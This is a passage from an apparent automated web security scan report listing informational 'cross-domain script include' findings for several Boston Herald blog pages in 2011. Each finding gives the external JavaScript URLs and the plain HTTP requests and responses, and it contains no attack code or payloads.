Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://widgets.twimg.com/j/2/widget.js

Request

GET /blogs/entertainment/disney_days/index.php/2011/01/26/castaway-cay-a-great-beach-stopover/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:55:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/entertainment/disney_days/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 36596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<td bgcolor=#ffffff>
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

18.581. http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects

Request

GET /blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:54:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/entertainment/guestlisted/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...

18.582. http://www.bostonherald.com/blogs/lifestyle/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/blogs/lifestyle/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /blogs/lifestyle/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:51:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 42655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.583. http://www.bostonherald.com/blogs/news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/blogs/news/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /blogs/news/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:54:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 52894

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.584. http://www.bostonherald.com/blogs/news/city_desk_wired/index.php/2011/01/27/keeping-a-roof-over-your-head/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/blogs/news/city_desk_wired/index.php/2011/01/27/keeping-a-roof-over-your-head/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects

Request

GET /blogs/news/city_desk_wired/index.php/2011/01/27/keeping-a-roof-over-your-head/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:54:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/news/city_desk_wired/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...

18.585. http://www.bostonherald.com/blogs/news/katy_on_the_campaign_trail/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/blogs/news/katy_on_the_campaign_trail/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://video.foxnews.com/v/embed.js?id=4500319&w=466&h=263

Request

GET /blogs/news/katy_on_the_campaign_trail/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:52:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://bostonherald.com/blogs/news/katy_on_the_campaign_trail/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 60029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<p><script type="text/javascript" src="http://video.foxnews.com/v/embed.js?id=4500319&w=466&h=263"></script>
...[SNIP]...


<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

18.586. http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects

Request

GET /blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:52:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/news/lone_republican/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...

18.587. http://www.bostonherald.com/blogs/news/on_the_t/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/blogs/news/on_the_t/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects

Request

GET /blogs/news/on_the_t/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:51:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/news/on_the_t/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 64725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<br>
<script src="http://admin.brightcove.com/js/BrightcoveExperiences.js" language="JavaScript" type="text/javascript"></script>
...[SNIP]...

18.588. http://www.bostonherald.com/blogs/sports/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/blogs/sports/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /blogs/sports/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:51:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
